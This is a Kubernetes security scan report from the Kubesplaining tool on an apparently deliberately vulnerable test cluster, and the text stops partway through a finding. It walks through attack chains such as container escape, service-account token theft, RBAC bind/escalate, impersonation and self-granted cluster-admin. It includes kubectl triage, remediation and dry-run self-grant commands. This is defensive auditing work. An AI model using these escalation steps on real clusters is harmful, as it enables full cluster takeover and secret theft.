Kubesplaining Security Report
Kubernetes v1.35.0 · API https://127.0.0.1:43063 · Snapshot 2026-05-04T13:52:13Z
Cluster reconnaissance: 1 node · 2 cluster-admins · 0 LoadBalancers · 2 NetworkPolicies
Cluster shape
Distribution: v1.35.0
Cloud: KIND
API server: 127.0.0.1 (loopback)
Nodes: 1 (1× amd64 · Debian GNU/Linux 12 (bookworm))
Kubelet: v1.35.0 ×1
Runtime: containerd://2.2.0 ×1
Inventory: 11 namespaces · 21 pods · 62 service accounts
Who already owns this cluster
cluster-admin: 2 (Group/kubeadm:cluster-admins, ServiceAccount/rbac-fixtures/sa-cluster-admin)
Wildcard verbs: 4 (Group/kubeadm:cluster-admins, Group/system:masters, ServiceAccount/rbac-fixtures/sa-cluster-admin, +1 more)
Reads secrets: 11 (Group/kubeadm:cluster-admins, Group/system:masters, ServiceAccount/kube-system/bootstrap-signer, +8 more)
Exposed surface
LoadBalancers: none
NodePort / externalIP: 0 NodePort · 0 externalIP
HostNetwork pods: 7 (kube-system/etcd-kubesplaining-e2e-control-plane, kube-system/kindnet-fdcpf, kube-system/kube-apiserver-kubesplaining-e2e-control-plane, +4 more)
Privileged pods: 3 (kube-system/kube-proxy-rnj59, psa-suppressed/psa-priv-app-54c64bdd84-rggt6, vulnerable/risky-app-5879fbc5d8-7w424)
Mutating webhooks: 1
Guardrails
NetworkPolicies: 2 across 2 namespaces · 5 namespaces unprotected
Pod Security: enforce=restricted ×1
Policy engines: none
Default-SA pods: 13 with token automount
Collection provenance
Permissions seen: 0 · missing: 0
Warnings: 0
Namespaces scanned: 11
Duration: 0.0s
Executive summary

2 independent paths to full cluster takeover

97 findings across 4 chains. Concentration: 37 in rbac-fixtures, 33 in vulnerable.

What the attack paths mean. Individual findings don't tell the whole story. Attackers chain them. This report detected 4 attack chains by looking at how rule IDs, subjects, and resources connect. The attack-paths diagram below makes those connections explicit; each chain is walked through in plain English further down.
35 critical · 44 high · 17 medium · 1 low
Pod Security Admission: 2 pod-security findings suppressed because the workload's namespace carries a pod-security.kubernetes.io/enforce label that would block it at admission time. Run with --admission-mode=off to see every finding regardless of admission state, or --admission-mode=attenuate to keep them visible at reduced severity.
Suppressed findings by namespace
  • psa-suppressed: KUBE-ESCAPE-001 ×1, KUBE-PODSEC-APE-001 ×1
Risk index
100 / 100
CRITICAL
Weighted from 35 critical, 44 high, 17 medium, 1 low.
  • 4 attack chains detected
  • 37 findings in namespace rbac-fixtures
  • 6 findings on Deployment/vulnerable/risky-app
Think in graphs

Attack paths

Legend: critical edge · high edge

Defenders look at findings as a list. Attackers chain them. This graph walks each entry point through the capability it grants to the impact it achieves, so a finding's real danger is the path it joins, not its individual score.

Showing 10 of 33. To keep the diagram readable, capabilities are capped at 10: the selection first guarantees one capability per impact category present in the cluster, then fills the remaining slots by severity and score. The findings index below has the complete list.

Entry points:
  • Deployment/vulnerable/risky-app (2 critical/high findings)
  • Deployment/vulnerable/socket-mounts-app (1 critical/high finding)
  • ServiceAccount/vulnerable/privileged-reader (1 critical/high finding)
  • ServiceAccount/rbac-fixtures/sa-bind-escalate (1 critical/high finding)
  • ServiceAccount/rbac-fixtures/sa-cluster-admin (1 critical/high finding)
  • ServiceAccount/rbac-fixtures/sa-impersonate (1 critical/high finding)
  • ServiceAccount/rbac-fixtures/sa-nodes-proxy (1 critical/high finding)
  • ServiceAccount/rbac-fixtures/sa-rolebinding-mutate (1 critical/high finding)
  • MutatingWebhookConfiguration/risky-ignore-webhook (1 critical/high finding)
Abused capabilities:
  • KUBE-ESCAPE-005 (CRITICAL, score 10.0): Docker socket mounted into Deployment/vulnerable/socket-mounts-app (volume docker-sock → /var/run/docker.sock)
  • KUBE-ESCAPE-006 (CRITICAL, score 10.0): Root filesystem (/) mounted from host into Deployment/vulnerable/risky-app
  • KUBE-PRIVESC-008 (CRITICAL, score 10.0): Cluster-wide impersonate permission on ServiceAccount/rbac-fixtures/sa-impersonate
  • KUBE-PRIVESC-009 (CRITICAL, score 10.0): Cluster-wide bind/escalate on roles bypasses RBAC (ServiceAccount/rbac-fixtures/sa-bind-escalate)
  • KUBE-PRIVESC-010 (CRITICAL, score 10.0): Cluster-wide write access to (Cluster)RoleBindings opens a self-grant path (ServiceAccount/rbac-fixtures/sa-rolebinding-mutate)
  • KUBE-PRIVESC-012 (CRITICAL, score 10.0): get nodes/proxy enables kubelet exec via API server (ServiceAccount/rbac-fixtures/sa-nodes-proxy)
  • KUBE-PRIVESC-017 (CRITICAL, score 10.0): Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-cluster-admin
  • KUBE-PRIVESC-005 (HIGH, score 10.0): Cluster-wide read access to Secrets on ServiceAccount/vulnerable/privileged-reader
  • KUBE-ESCAPE-003 (HIGH, score 8.1): Pod shares host network (hostNetwork: true) in Deployment/vulnerable/risky-app
  • KUBE-ADMISSION-001 (HIGH, score 7.9): MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local is fail-open (failurePolicy: Ignore) on security-critical resources
Impacts:
  • PRIVILEGE ESCALATION: impersonation, container escape, SA takeover
  • LATERAL REACH: cross-namespace, node-local, egress
  • DATA EXFILTRATION: tokens, secrets, application data
  • CONTROL BYPASS: admission, webhooks, API policies
Walkthroughs

Attack-chain narratives

Auto-detected from rule combinations in this scan. Each walks through, in attacker order, how the findings connect.

CRITICAL

Privileged workload → node root

  1. An attacker gains code execution in a workload co-scheduled with, or targeting, one of:
    • Deployment/vulnerable/host-ns-app
    • Deployment/vulnerable/risky-app
    • Deployment/vulnerable/socket-mounts-app
  2. The workload is configured to trust the host in one or more ways. Privileged mode grants all capabilities; a hostPath of / mounts the node's root filesystem; hostPID/hostIPC share the host's process and IPC namespaces.
  3. Any one of these alone is enough for a straightforward container escape: write into the host filesystem, exec through /proc/1, or interact with the kubelet's unix socket.
  4. From there, the attacker reads projected tokens for every other pod on the node and pivots into the cluster with those identities.
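A minimal triage sketch for this chain, assuming kubectl and jq against the scanned cluster: it lists pods whose spec carries any of the trust settings named above (privileged containers, a host-root hostPath, or shared host namespaces), so the three deployments in step 1 can be confirmed directly.

# Triage sketch (assumes kubectl + jq): list pods that are privileged,
# mount the host root filesystem, or share host PID/IPC/network namespaces.
kubectl get pods -A -o json | jq -r '
  .items[]
  | select(
      .spec.hostPID == true or .spec.hostIPC == true or .spec.hostNetwork == true
      or ([.spec.volumes[]?.hostPath.path] | index("/"))
      or ([.spec.containers[].securityContext.privileged] | index(true))
    )
  | "\(.metadata.namespace)/\(.metadata.name)"'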
CRITICAL

Token theft → cluster-admin impersonation

  1. The attacker lands on a workload that mounts ServiceAccount/vulnerable/privileged-reader, or phishes a kubeconfig bound to it.
  2. That identity holds cluster-wide get/list on secrets, which includes service-account tokens in every namespace. The attacker lists kube-system secrets and reads tokens belonging to powerful controllers.
  3. Even without the token read, the same identity can create pods cluster-wide. The attacker schedules a pod that mounts the target service account, execs in, and acts as it.
  4. Either path converges on a cluster-admin-equivalent identity; all policies, secrets, and workloads are now under attacker control.
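A quick verification sketch, assuming kubectl run from an admin context (impersonation via --as requires impersonate rights): check whether the privileged-reader identity really holds the two capabilities this chain leans on, cluster-wide secret reads and cluster-wide pod creation.

# Verification sketch: both commands should answer yes/no for the identity.
kubectl auth can-i get secrets --all-namespaces \
  --as=system:serviceaccount:vulnerable:privileged-reader
kubectl auth can-i create pods --all-namespaces \
  --as=system:serviceaccount:vulnerable:privileged-reader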
HIGH

Admission gap → silent enforcement bypass

  1. The webhook that should block dangerous pods fails open: failurePolicy: Ignore means any backend outage (or a targeted denial-of-service) silently disables enforcement for the window the attacker needs.
  2. Its namespace selector excludes at least one sensitive namespace, so workloads placed there skip admission entirely.
  3. The webhook keys off a workload-controlled label. Omit the label and admission doesn't apply.
  4. Any one of the above is a full bypass of the admission gate you thought was catching misconfigurations. In practice, this means every other chain in this report becomes easier to execute.
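To see which webhooks are in this state, a small audit sketch (assumes kubectl and jq): it prints each mutating webhook's failure policy and selectors, so fail-open entries and label-keyed scoping stand out.

# Audit sketch: one line per webhook with its failurePolicy and selectors.
kubectl get mutatingwebhookconfigurations -o json | jq -r '
  .items[].webhooks[]
  | "\(.name)  failurePolicy=\(.failurePolicy)  namespaceSelector=\(.namespaceSelector // {})  objectSelector=\(.objectSelector // {})"'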
HIGH

Flat network → unrestricted lateral reach

  1. Namespaces with no NetworkPolicies treat every pod as reachable from every other pod. There is no default-deny, so a compromised workload can reach every service on every pod.
  2. An allow-from-all-namespaces policy is effectively no policy: traffic from any namespace matches, including attacker-controlled namespaces.
  3. Egress 0.0.0.0/0 gives the attacker free outbound reach. Stolen tokens, secrets, and staging data leave the cluster with nothing in the way.
  4. Combined, the attacker sweeps every pod in the cluster for vulnerable services and exfiltrates data without tripping a segmentation boundary.
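A remediation sketch for the first step of closing this chain: a default-deny NetworkPolicy. The namespace name vulnerable is taken from this report's findings; apply one per unprotected namespace, and only after mapping and explicitly allowing legitimate flows, since this blocks all ingress and egress for selected pods.

# Default-deny sketch for one unprotected namespace (repeat per namespace).
kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: vulnerable
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
EOF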
Where the risk clusters

Severity × attack category

Legend: Critical · High · Medium · Low
Module coverage

Findings by module

Risk hotspots

Resource × attack category

Cell color intensity = finding concentration. Rows sorted top-first by severity weight.

[Heatmap omitted: rows are the affected resources; columns are Priv. escalation, Lateral movement, Data exfil, Infra modification, Defense evasion.]
Findings index
Privesc 28 findings · 6 rules
RBAC 14 findings · 10 rules
Pod Security 32 findings · 13 rules
Service Accounts 8 findings · 4 rules
Network Policy 10 findings · 5 rules
Admission Webhooks 3 findings · 3 rules
Secrets & ConfigMaps 2 findings · 2 rules

Privesc

28 findings · 6 rules · 18 critical · 10 high · 0 medium · 0 low
CRITICAL

Subjects can reach cluster-admin equivalent in 1 hop(s)

KUBE-PRIVESC-PATH-CLUSTER-ADMIN 8 subjects Score 9.8–9.3
MITRE ATT&CK: T1078.004 · T1098 · T1068 · T1556

Affected subjects (8)

CRITICAL ServiceAccount/rbac-fixtures/sa-bind-escalate Cluster 9.8
ServiceAccount/rbac-fixtures/sa-bind-escalate can reach cluster-admin equivalent in 1 hop(s)
Scope: Cluster · Source: ServiceAccount/rbac-fixtures/sa-bind-escalate → cluster-admin equivalent (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-bind-escalate

Subject ServiceAccount/rbac-fixtures/sa-bind-escalate has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-bind-escalate via bind_or_escalate (bind,escalate roles|clusterroles): can bypass RBAC escalation checks via bind/escalate

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-bind-escalate (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-bind-escalate (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-bind-escalate, the attacker uses the RBAC bind/escalate bypass (bind,escalate roles|clusterroles) to grant themselves any role they choose, typically cluster-admin. bind/escalate is the carve-out that lets the holder escape RBAC's normal "you can only grant what you have" guardrail.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. RBAC bind/escalate bypass bind_or_escalate

    RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

    Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

    From ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted bind,escalate roles|clusterroles
    Gives the attacker can bypass RBAC escalation checks via bind/escalate
Remediation
Break the chain at the weakest hop: remove the bind,escalate roles|clusterroles capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-bind-escalate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the bind,escalate roles|clusterroles capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-bind-escalate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
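A sketch of remediation steps 1–2 for this subject, assuming kubectl and jq run from an admin context: confirm the verbs actually resolve, then locate the binding that grants them. Binding names will vary per cluster; add a pass over rolebindings -A if the grant might be namespaced.

kubectl auth can-i bind clusterroles --as=system:serviceaccount:rbac-fixtures:sa-bind-escalate
kubectl auth can-i escalate clusterroles --as=system:serviceaccount:rbac-fixtures:sa-bind-escalate
# Which ClusterRoleBinding grants it to this ServiceAccount?
kubectl get clusterrolebindings -o json | jq -r '
  .items[]
  | select(.subjects[]? | .kind == "ServiceAccount"
           and .namespace == "rbac-fixtures" and .name == "sa-bind-escalate")
  | "\(.metadata.name) -> \(.roleRef.kind)/\(.roleRef.name)"'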
CRITICAL ServiceAccount/rbac-fixtures/sa-cluster-admin Cluster 9.8
ServiceAccount/rbac-fixtures/sa-cluster-admin can reach cluster-admin equivalent in 1 hop(s)
Scope: Cluster · Source: ServiceAccount/rbac-fixtures/sa-cluster-admin → cluster-admin equivalent (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-cluster-admin

Subject ServiceAccount/rbac-fixtures/sa-cluster-admin has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-cluster-admin via wildcard_permission (*:*:*): wildcard verbs on wildcard resources in wildcard API groups

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-cluster-admin (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-cluster-admin (RCE in any application using its identity, leaked token, or compromised image).
  2. The identity ServiceAccount/rbac-fixtures/sa-cluster-admin already holds wildcard verbs on wildcard resources (*:*:*), which is functionally identical to cluster-admin. The attacker can take any action on any resource in the cluster without further escalation.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Wildcard verbs × wildcard resources wildcard_permission

    An RBAC rule with verbs: ["*"], resources: ["*"], and apiGroups: ["*"] is functionally identical to cluster-admin, even if it isn't called that. Often introduced by careless Helm charts or "give it permission to everything until it works" debugging.

    From ServiceAccount/rbac-fixtures/sa-cluster-admin
    Permission granted *:*:*
    Gives the attacker wildcard verbs on wildcard resources in wildcard API groups
Remediation
Break the chain at the weakest hop: remove the permission *:*:* that enables the first hop (ServiceAccount/rbac-fixtures/sa-cluster-admin/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the permission *:*:* that enables the first hop (ServiceAccount/rbac-fixtures/sa-cluster-admin/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
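The report's step 5 names Kyverno or OPA Gatekeeper; as an illustrative alternative that needs no extra engine (built-in ValidatingAdmissionPolicy, Kubernetes 1.30+), a sketch that rejects new Roles and ClusterRoles carrying wildcard verbs on wildcard resources, which are the objects where those verbs actually live. Resource names here are hypothetical.

kubectl apply -f - <<'EOF'
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicy
metadata:
  name: deny-wildcard-rbac            # hypothetical name
spec:
  failurePolicy: Fail
  matchConstraints:
    resourceRules:
      - apiGroups: ["rbac.authorization.k8s.io"]
        apiVersions: ["v1"]
        operations: ["CREATE", "UPDATE"]
        resources: ["roles", "clusterroles"]
  validations:
    - expression: >-
        !has(object.rules) ||
        !object.rules.exists(r, ('*' in r.verbs) && has(r.resources) && ('*' in r.resources))
      message: "RBAC rules granting wildcard verbs on wildcard resources are not allowed."
---
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicyBinding
metadata:
  name: deny-wildcard-rbac-binding    # hypothetical name
spec:
  policyName: deny-wildcard-rbac
  validationActions: ["Deny"]
EOF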
CRITICAL ServiceAccount/rbac-fixtures/sa-impersonate Cluster 9.8
ServiceAccount/rbac-fixtures/sa-impersonate can reach cluster-admin equivalent in 1 hop(s)
Scope: Cluster · Source: ServiceAccount/rbac-fixtures/sa-impersonate → cluster-admin equivalent (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-impersonate

Subject ServiceAccount/rbac-fixtures/sa-impersonate has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-impersonate via impersonate (impersonate users|groups): can impersonate another identity

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-impersonate (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-impersonate (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker uses RBAC impersonation (the impersonate verb on impersonate users|groups) to send API requests as any identity in the cluster, including system:masters, which the apiserver hard-codes as cluster-admin. Granting impersonate on groups: ["*"] is functionally a cluster-admin grant.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. RBAC impersonation impersonate

    Kubernetes has a built-in "act as another user" feature: the impersonate verb on users, groups, or serviceaccounts. Anyone with that verb can submit requests as any identity, bypassing whatever permissions they don't have themselves.

    Granting impersonate on groups = ["*"] is equivalent to cluster-admin: the holder can impersonate system:masters.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate users|groups
    Gives the attacker can impersonate another identity
Remediation
Break the chain at the weakest hop: remove the impersonate users|groups capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the impersonate users|groups capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-impersonate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
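A sketch of remediation step 4, with hypothetical names: if a workload genuinely needs impersonation, pin it to a fixed allowlist with resourceNames rather than users: [*] or groups: [*]. User impersonation is the impersonate verb on the core-group users resource, and resourceNames limits which usernames may be assumed.

kubectl apply -f - <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: impersonate-ci-bot-only        # hypothetical name
rules:
  - apiGroups: [""]
    resources: ["users"]
    verbs: ["impersonate"]
    resourceNames: ["ci-bot"]          # hypothetical: the only principal that may be impersonated
EOF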
CRITICAL ServiceAccount/rbac-fixtures/sa-rolebinding-mutate Cluster 9.8
ServiceAccount/rbac-fixtures/sa-rolebinding-mutate can reach cluster-admin equivalent in 1 hop(s)
Scope: Cluster · Source: ServiceAccount/rbac-fixtures/sa-rolebinding-mutate → cluster-admin equivalent (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-rolebinding-mutate

Subject ServiceAccount/rbac-fixtures/sa-rolebinding-mutate has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-rolebinding-mutate via modify_role_binding (create,update,patch rolebindings|clusterrolebindings): can create or mutate role bindings to grant itself any role

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-rolebinding-mutate (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-rolebinding-mutate (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings|clusterrolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-fixtures/sa-rolebinding-mutate
    Permission granted create,update,patch rolebindings|clusterrolebindings
    Gives the attacker can create or mutate role bindings to grant itself any role
Remediation
Break the chain at the weakest hop: remove the create,update,patch rolebindings|clusterrolebindings capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-rolebinding-mutate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings|clusterrolebindings capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-rolebinding-mutate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
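A non-destructive check for this finding, best run in a lab cluster: a server-side dry-run of the exact self-grant described above. The request passes authorization and admission but persists nothing, so a success response proves the path is live.

# Dry-run sketch: attempt the self-grant as the risky ServiceAccount.
kubectl create clusterrolebinding attacker-self-grant \
  --clusterrole=cluster-admin \
  --serviceaccount=rbac-fixtures:sa-rolebinding-mutate \
  --as=system:serviceaccount:rbac-fixtures:sa-rolebinding-mutate \
  --dry-run=server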
CRITICAL ServiceAccount/rbac-fixtures/sa-wildcard Cluster 9.8
ServiceAccount/rbac-fixtures/sa-wildcard can reach cluster-admin equivalent in 1 hop(s)
Scope: Cluster · Source: ServiceAccount/rbac-fixtures/sa-wildcard → cluster-admin equivalent (terminal sink is cluster-scoped: full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-wildcard

Subject ServiceAccount/rbac-fixtures/sa-wildcard has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-wildcard via wildcard_permission (*:*:*): wildcard verbs on wildcard resources in wildcard API groups

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-wildcard (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-wildcard (RCE in any application using its identity, leaked token, or compromised image).
  2. The identity ServiceAccount/rbac-fixtures/sa-wildcard already holds wildcard verbs on wildcard resources (*:*:*), which is functionally identical to cluster-admin. The attacker can take any action on any resource in the cluster without further escalation.
